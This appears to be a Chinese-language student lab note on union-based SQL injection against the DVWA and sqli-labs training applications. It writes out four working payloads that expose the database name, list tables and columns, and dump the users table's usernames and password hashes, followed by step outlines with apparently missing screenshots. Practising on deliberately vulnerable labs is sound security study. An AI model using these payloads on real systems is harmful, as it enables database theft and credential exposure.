DVWA训练基础 low级别

1.参照上文确定当前库

1' union select (select database()),2 -- - 

2.确定库后，爆表

1' union select (select group_concat(table_name) from information_schema.tables where table_schema = 'dvwa'),2 -- -

3.确定表后，爆字段

1' union select (select group_concat(column_name) from information_schema.columns where table_schema = 'dvwa' and table_name='users'),2 -- - 

4.确定字段后，进行拖库

1' union select (select group_concat(concat_ws(0x7e,user,password))from users),2 -- - 

以sqli-labs-master作为练习

第一步，使用拼接的方式决定注入类型 ( 第二题)

 

‘

 

第二部，使用order by确定有表单有几列值

order by根据指定的列对结果集进行排序

 

第三步，使用union select 来找到内容，获取想要得到内容

union select ：联合查询

 

进阶，通过mysql注入获取表单内容，托库；

第一步：通过数据库语句进行搜索，首先确定数据库

 

第二部：确定数据库后，爆出它的表；

 

第三步：确定表以后，可根据实际需求爆表，这里以users举例，进行爆字段

 

第四部：确定字段后，我们就可以拖库

(第一题)

寻找sql注入点(第三题)

 

 

 

判断显示位，经过排除发现他的显示位是3列

 

 

 

 

查询到数据库名，用户名

 

 

查询所有数据库名，表名

 

拖库

第四题

寻找sql注入点

判断显示位，经过排除发现他的显示位是3列

进行下一步操作，让他显示第二行数据

查询所有数据库名，表名